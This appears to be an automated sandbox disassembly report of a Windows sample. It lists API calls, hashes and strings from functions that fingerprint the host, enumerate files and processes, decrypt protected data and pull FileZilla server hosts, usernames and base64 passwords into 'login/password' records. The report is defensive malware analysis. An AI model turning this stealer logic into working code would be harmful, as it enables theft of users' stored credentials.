Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID: c.A$c.A
API String ID: 3066467675-270182787
Opcode ID: 0de907d42740b73276ee4841b6eaeb85befe0f9a3eb9d020644180b68549cc61
Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
Opcode Fuzzy Hash: 0de907d42740b73276ee4841b6eaeb85befe0f9a3eb9d020644180b68549cc61
Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
FindClose.KERNEL32(000000FF), ref: 0040D500

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: f41b9faf97c03d21ff03c185924b8b342649efa7cdb05378454d2323efcabeab
Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
Opcode Fuzzy Hash: f41b9faf97c03d21ff03c185924b8b342649efa7cdb05378454d2323efcabeab
Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
LocalFree.KERNEL32(00000000), ref: 004146DF

Strings

/ , xrefs: 0041463C

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 6beba432bb96e3c84f5a57a5e63355993c4d593e46cb58c7d3b5d81651624c51
Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
Opcode Fuzzy Hash: 6beba432bb96e3c84f5a57a5e63355993c4d593e46cb58c7d3b5d81651624c51
Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306

Strings

\*.*, xrefs: 0040DB7D

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 72f6734ba949fb204cdb31aa2d361f577838c1988200e0d7a2c5188d89033d93
Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
Opcode Fuzzy Hash: 72f6734ba949fb204cdb31aa2d361f577838c1988200e0d7a2c5188d89033d93
Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 004155A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Strings

>N@, xrefs: 004155B8, 00415614, 004155BB, 00415617

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID: >N@
API String ID: 80407269-3381801619
Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415D00 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
CloseHandle.KERNEL32(0041D599), ref: 00415D7A

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,04147AE0,00000000,?,0041D758,00000000,?,00000000,00000000,?,04148358,00000000), ref: 004144C0
HeapAlloc.KERNEL32(00000000), ref: 004144C7
GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
wsprintfA.USER32 ref: 00414514

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97

Uniqueness

Uniqueness Score: -1.00%

Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
LocalFree.KERNEL32(?), ref: 004095AF

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00401177,04143330,004136EB,0041D6E3), ref: 004143CD
HeapAlloc.KERNEL32(00000000), ref: 004143D4
GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91

Uniqueness

Uniqueness Score: -1.00%

Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
ExitProcess.KERNEL32 ref: 0040113E

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004070E0 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
lstrcat.KERNEL32(?,04144808), ref: 004072AB
lstrcat.KERNEL32(?,?), ref: 004072BF
lstrcat.KERNEL32(?,?), ref: 004072D3
lstrcat.KERNEL32(?,?), ref: 004072E7
lstrcat.KERNEL32(?,04147E88), ref: 004072FB
lstrcat.KERNEL32(?,04147CF0), ref: 0040730F
lstrcat.KERNEL32(?,04147D20), ref: 00407322
lstrcat.KERNEL32(?,04148AA8), ref: 00407336
lstrcat.KERNEL32(?,04144890), ref: 0040734A
lstrcat.KERNEL32(?,?), ref: 0040735E
lstrcat.KERNEL32(?,?), ref: 00407372
lstrcat.KERNEL32(?,?), ref: 00407386
lstrcat.KERNEL32(?,04147E88), ref: 00407399
lstrcat.KERNEL32(?,04147CF0), ref: 004073AD
lstrcat.KERNEL32(?,04147D20), ref: 004073C1
lstrcat.KERNEL32(?,04148AA8), ref: 004073D4
lstrcat.KERNEL32(?,041448F8), ref: 004073E8
lstrcat.KERNEL32(?,?), ref: 004073FC
lstrcat.KERNEL32(?,?), ref: 00407410
lstrcat.KERNEL32(?,?), ref: 00407424
lstrcat.KERNEL32(?,04147E88), ref: 00407438
lstrcat.KERNEL32(?,04147CF0), ref: 0040744B
lstrcat.KERNEL32(?,04147D20), ref: 0040745F
lstrcat.KERNEL32(?,04148AA8), ref: 00407473
lstrcat.KERNEL32(?,041486D0), ref: 00407486
lstrcat.KERNEL32(?,?), ref: 0040749A
lstrcat.KERNEL32(?,?), ref: 004074AE
lstrcat.KERNEL32(?,?), ref: 004074C2
lstrcat.KERNEL32(?,04147E88), ref: 004074D6
lstrcat.KERNEL32(?,04147CF0), ref: 004074EA
lstrcat.KERNEL32(?,04147D20), ref: 004074FD
lstrcat.KERNEL32(?,04148AA8), ref: 00407511
lstrcat.KERNEL32(?,04148738), ref: 00407525
lstrcat.KERNEL32(?,?), ref: 00407539
lstrcat.KERNEL32(?,?), ref: 0040754D
lstrcat.KERNEL32(?,?), ref: 00407561
lstrcat.KERNEL32(?,04147E88), ref: 00407574
lstrcat.KERNEL32(?,04147CF0), ref: 00407588
lstrcat.KERNEL32(?,04147D20), ref: 0040759C
lstrcat.KERNEL32(?,04148AA8), ref: 004075AF
lstrcat.KERNEL32(?,041487A0), ref: 004075C3
lstrcat.KERNEL32(?,?), ref: 004075D7
lstrcat.KERNEL32(?,?), ref: 004075EB
lstrcat.KERNEL32(?,?), ref: 004075FF
lstrcat.KERNEL32(?,04147E88), ref: 00407613
lstrcat.KERNEL32(?,04147CF0), ref: 00407626
lstrcat.KERNEL32(?,04147D20), ref: 0040763A
lstrcat.KERNEL32(?,04148AA8), ref: 0040764E

Part of subcall function 00406FA0: lstrcat.KERNEL32(30AB4020,0041DEB8), ref: 00406FD6
Part of subcall function 00406FA0: lstrcat.KERNEL32(30AB4020,00000000), ref: 00407018
Part of subcall function 00406FA0: lstrcat.KERNEL32(30AB4020, : ), ref: 0040702A
Part of subcall function 00406FA0: lstrcat.KERNEL32(30AB4020,00000000), ref: 0040705F
Part of subcall function 00406FA0: lstrcat.KERNEL32(30AB4020,0041DEC0), ref: 00407070
Part of subcall function 00406FA0: lstrcat.KERNEL32(30AB4020,00000000), ref: 004070A3
Part of subcall function 00406FA0: lstrcat.KERNEL32(30AB4020,0041DEC4), ref: 004070BD
Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB

lstrcat.KERNEL32(?,041434A0), ref: 004077DB
lstrcat.KERNEL32(?,041480B8), ref: 004077EE
lstrlen.KERNEL32(30AB4020), ref: 004077FB
lstrlen.KERNEL32(30AB4020), ref: 0040780B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,041434C0), ref: 00404ED9

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
String ID:
API String ID: 3958002797-0
Opcode ID: 71a07dda988696830ba42ff86637ae7152b3adc93f1422aa4a5be7619d59b96e
Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
Opcode Fuzzy Hash: 71a07dda988696830ba42ff86637ae7152b3adc93f1422aa4a5be7619d59b96e
Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

strtok_s.MSVCRT ref: 0040EB5B
GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
lstrlen.KERNEL32(00000000), ref: 0040EBD3

Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
lstrlen.KERNEL32(00000000), ref: 0040EC1D
StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
lstrlen.KERNEL32(00000000), ref: 0040EC67
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
lstrlen.KERNEL32(00000000), ref: 0040ECB5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
lstrcat.KERNEL32(?,login: ), ref: 0040EE13
lstrcat.KERNEL32(?,00000000), ref: 0040EE26
lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
lstrcat.KERNEL32(?,password: ), ref: 0040EE44
lstrcat.KERNEL32(?,00000000), ref: 0040EE57
lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
strtok_s.MSVCRT ref: 0040EEB9
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
memset.MSVCRT ref: 0040EF17

Strings

password: , xrefs: 0040EE3B
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040EAE4
browser: FileZilla, xrefs: 0040ED99
profile: null, xrefs: 0040EDA8
login: , xrefs: 0040EE0A
<Host>, xrefs: 0040EBBC
<Pass encoding="base64">, xrefs: 0040EC9A
<User>, xrefs: 0040EC50
url: , xrefs: 0040EDB7
<Port>, xrefs: 0040EC06

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: cab5d478a700550077d3886c2a1706362e5d885cf538c2e79374ea94af899fbf
Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
Opcode Fuzzy Hash: cab5d478a700550077d3886c2a1706362e5d885cf538c2e79374ea94af899fbf
Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00415ED0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,04142FB8), ref: 00415F11
GetProcAddress.KERNEL32(74DD0000,04143030), ref: 00415F2A
GetProcAddress.KERNEL32(74DD0000,04143048), ref: 00415F42
GetProcAddress.KERNEL32(74DD0000,04142F88), ref: 00415F5A
GetProcAddress.KERNEL32(74DD0000,04143060), ref: 00415F73
GetProcAddress.KERNEL32(74DD0000,041431C0), ref: 00415F8B
GetProcAddress.KERNEL32(74DD0000,04127100), ref: 00415FA3
GetProcAddress.KERNEL32(74DD0000,041270C0), ref: 00415FBC
GetProcAddress.KERNEL32(74DD0000,04142E98), ref: 00415FD4
GetProcAddress.KERNEL32(74DD0000,04142EB0), ref: 00415FEC
GetProcAddress.KERNEL32(74DD0000,04142E38), ref: 00416005
GetProcAddress.KERNEL32(74DD0000,04142FA0), ref: 0041601D
GetProcAddress.KERNEL32(74DD0000,04127260), ref: 00416035
GetProcAddress.KERNEL32(74DD0000,04143078), ref: 0041604E
GetProcAddress.KERNEL32(74DD0000,04143090), ref: 00416066
GetProcAddress.KERNEL32(74DD0000,04127140), ref: 0041607E
GetProcAddress.KERNEL32(74DD0000,04142DA8), ref: 00416097
GetProcAddress.KERNEL32(74DD0000,04142FD0), ref: 004160AF
GetProcAddress.KERNEL32(74DD0000,04127220), ref: 004160C7
GetProcAddress.KERNEL32(74DD0000,04142F28), ref: 004160E0
GetProcAddress.KERNEL32(74DD0000,04127400), ref: 004160F8
LoadLibraryA.KERNEL32(04142F40,?,004136C0), ref: 0041610A
